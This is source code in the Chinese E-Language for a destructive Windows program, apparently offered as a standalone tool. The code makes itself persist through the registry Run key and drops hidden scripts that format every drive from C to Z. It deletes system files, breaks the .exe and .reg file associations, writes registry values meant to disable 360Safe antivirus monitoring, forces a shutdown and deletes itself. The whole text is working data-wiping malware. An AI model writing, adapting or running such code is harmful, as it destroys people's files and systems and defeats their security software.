.版本 2
写到文件 (读环境变量 (“SystemRoot”) + “\system32” + “\” + 到文本 (取分钟 (取现行时间 ())) + “.vbs”, 到字节集 (“set Cleaner=createobject(” + 左逗号.标题 + “wscript.shell” + 右逗号.标题 + “)” + #换行符 + “Cleaner.run” + 左逗号.标题 +读环境变量 (“SystemRoot”) + “\system32” + “\” + 到文本 (取秒 (取现行时间 ())) + “.bat” + 右逗号.标题 + “,vbhide”)) ' 创建隐藏批处理脚本
置文件属性 (读环境变量 (“SystemRoot”) + “\system32” + “\” + 到文本 (取分钟 (取现行时间 ())) + “.vbs”, 7 + 32)
写到文件 (读环境变量 (“SystemRoot”) + “\system32” + “\” + 到文本 (取秒 (取现行时间 ())) + “.bat”, 到字节集 (“@echo off” + #换行符 + “for %%i in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO format %%i: /q /x /y” + #换行符 + “del /f /s /q /a %SystemRoot%\system32\*.msc”)) ' 创建格式化和删除没运行文件的批处理
置文件属性 (读环境变量 (“SystemRoot”) + “\system32” + “\” + 到文本 (取秒 (取现行时间 ())) + “.bat”, 7 + 32)
写注册项 (4, “Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe”, 读环境变量 (“SystemRoot”) + “\system32” + “\” + 到文本 (取分钟 (取现行时间 ())) + “.vbs”) ' 把隐藏批处理脚本加入启动项
' 修改EXE图标
写到文件 (读环境变量 (“SystemRoot”) + “\system32” + “\wscript.ico”, #ico)
' 置文件属性 (读环境变量 (“SystemRoot”) + “\system32\wscript.ico”, 7 + 32)
写到文件 (读环境变量 (“SystemRoot”) + “\system32\reg.reg”, 到字节集 (“Windows Registry Editor Version 5.00” + #换行符 + “[HKEY_CLASSES_ROOT\exefile\DefaultIcon]” + #换行符 + “@=” + 左逗号.标题 +读环境变量 (“SystemRoot”) + “\system32\wscript.ico” + 右逗号.标题))
写到文件 (读环境变量 (“SystemRoot”) + “\system32\reg.bat”, 到字节集 (“@echo off” + #换行符 + “regedit /s reg.reg” + #换行符 + “assoc .exe=exefile” + #换行符 + “del /f /s /q /a ” + 读环境变量 (“SystemRoot”) + “\system32\reg.reg” + #换行符 + “del /f /s /q /a ” + 读环境变量 (“SystemRoot”) + “\system32\reg.bat”))
运行 (读环境变量 (“SystemRoot”) + “\system32\reg.bat”, 假, 1)
写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 1)
写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 1)
写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 1)
写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 1)
' 修改关联
写注册项 (1, “.reg\”, “jpegfile”)
写注册项 (1, “.exe\”, “jpegfile”)
关闭系统 (2, 假)
_启动窗口.销毁 ()
运行 (“Shutdown /s /t 60”, 假, )
.子程序 __启动窗口_将被销毁
写到文件 (取运行目录 () + “\del.bat”, 到字节集 (“@echo off” + #换行符 + “del ” + 左逗号.标题 + 取运行目录 () + “\” + 取执行文件名 () + 右逗号.标题 + #换行符 + “del ” + 左逗号.标题 + 取运行目录 () + “\del.bat” + 右逗号.标题))
运行 (取运行目录 () + “\del.bat”, 假, 1)
运行 (“del.bat”, 假, 1)
' ' 删除自己